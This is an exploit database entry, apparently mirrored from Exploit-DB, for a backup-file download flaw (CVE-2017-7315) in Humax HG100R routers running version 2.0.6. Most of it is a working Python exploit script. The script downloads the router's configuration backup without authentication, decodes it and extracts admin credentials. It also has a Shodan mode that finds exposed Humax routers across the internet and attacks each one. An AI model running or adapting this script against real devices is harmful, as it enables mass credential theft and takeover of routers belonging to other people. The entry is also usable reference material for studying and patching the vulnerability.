ID

VAR-E-201706-0189


EDB ID

42284


TITLE

Humax HG100R 2.0.6 - Backup File Download - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 42284

DESCRIPTION

Humax HG100R 2.0.6 - Backup File Download. Webapps exploit for the Hardware platform.

Trust: 0.6

sources: EXPLOIT-DB: 42284

AFFECTED PRODUCTS

vendor: humax, model: hg100r, scope: eq, version: 2.0.6

Trust: 1.6

sources: EXPLOIT-DB: 42284 // EDBNET: 93400

EXPLOIT

# coding: utf-8

# Exploit Title: Humax Backup file download
# Date: 29/06/2017
# Exploit Author: gambler
# Vendor Homepage: http://humaxdigital.com
# Version: VER 2.0.6
# Tested on: OSX Linux
# CVE : CVE-2017-7315

import sys
import base64
import shodan
import requests
import subprocess

def banner():
    print '''
██░ ██ █ ██ ███▄ ▄███▓ ▄▄▄ ▒██ ██▒
▓██░ ██▒ ██ ▓██▒▓██▒▀█▀ ██▒▒████▄ ▒▒ █ █ ▒░
▒██▀▀██░▓██ ▒██░▓██ ▓██░▒██ ▀█▄ ░░ █ ░
░▓█ ░██ ▓▓█ ░██░▒██ ▒██ ░██▄▄▄▄██ ░ █ █ ▒
░▓█▒░██▓▒▒█████▓ ▒██▒ ░██▒ ▓█ ▓██▒▒██▒ ▒██▒
▒ ░░▒░▒░▒▓▒ ▒ ▒ ░ ▒░ ░ ░ ▒▒ ▓▒█░▒▒ ░ ░▓ ░
▒ ░▒░ ░░░▒░ ░ ░ ░ ░ ░ ▒ ▒▒ ░░░ ░▒ ░
░ ░░ ░ ░░░ ░ ░ ░ ░ ░ ▒ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░
'''
    print 'Description: Humax HG100R backup file download'
    print 'Software Version: VER 2.0.6'
    print 'SDK Version: 5.7.1mp1'
    print 'IPv6 Stack Version: 1.2.2'
    print 'Author: Gambler'
    print 'Vulnerability founded: 14/03/2016'
    print 'CVE: waiting'
    print

def xplHelp():
    print 'Exploit syntax error, Example:'
    print 'python xpl.py http://192.168.0.1'

def exploit(server):
    path = '/view/basic/GatewaySettings.bin'
    if not server.startswith('http'):
        server = 'http://%s' % server
    if server.endswith('/'):
        server = server[:-1]+''
    url = '%s/%s' %(server,path)
    print '[+] - Downloading configuration file and decoding'
    try:
        r = requests.get(url, stream=True,timeout=10)
        for chunk in r.iter_content(chunk_size=1024):
            if chunk:
                rawdata = r.content
                save(rawdata)
    except:
        pass

def save(rawdata):
    config = base64.b64decode(rawdata).decode('ascii','ignore').replace('^@','')
    open('config.txt', 'w').write(config)
    print '[+] - Done, file saved as config.txt'
    infos = subprocess.Popen(["strings config.txt | grep -A 1 admin"], shell=True,stdout=subprocess.PIPE).communicate()[0]
    print '[+] - Credentials found'
    print infos

def shodanSearch():
    SHODAN_API_KEY = "SHODAN_API_KEY"
    api = shodan.Shodan(SHODAN_API_KEY)
    try:
        results = api.search('Copyright © 2014 HUMAX Co., Ltd. All rights reserved.')
        print 'Results found: %s' % results['total']
        for result in results['matches']:
            router = 'http://%s:%s' % (result['ip_str'],result['port'])
            print router
            exploit(router)
    except shodan.APIError, e:
        print 'Error: %s' % e

if __name__ == '__main__':

    if len(sys.argv) < 2:
        xplHelp()
        sys.exit()
    banner()
    if sys.argv[1] == 'shodan':
        shodanSearch()
    else:
        exploit(sys.argv[1])

Trust: 1.0

sources: EXPLOIT-DB: 42284

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 42284

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 42284

TYPE

Backup File Download

Trust: 1.6

sources: EXPLOIT-DB: 42284 // EDBNET: 93400

CREDITS

gambler

Trust: 0.6

sources: EXPLOIT-DB: 42284

EXTERNAL IDS

db: EXPLOIT-DB, id: 42284

Trust: 1.6

db: EDBNET, id: 93400

Trust: 0.6

sources: EXPLOIT-DB: 42284 // EDBNET: 93400

REFERENCES

url: https://www.exploit-db.com/exploits/42284/

Trust: 0.6

sources: EDBNET: 93400

SOURCES

db: EXPLOIT-DB, id: 42284
db: EDBNET, id: 93400

LAST UPDATE DATE

2022-07-27T09:40:01.114000+00:00


SOURCES RELEASE DATE

db: EXPLOIT-DB, id: 42284, date: 2017-06-30T00:00:00
db: EDBNET, id: 93400, date: 2017-06-30T00:00:00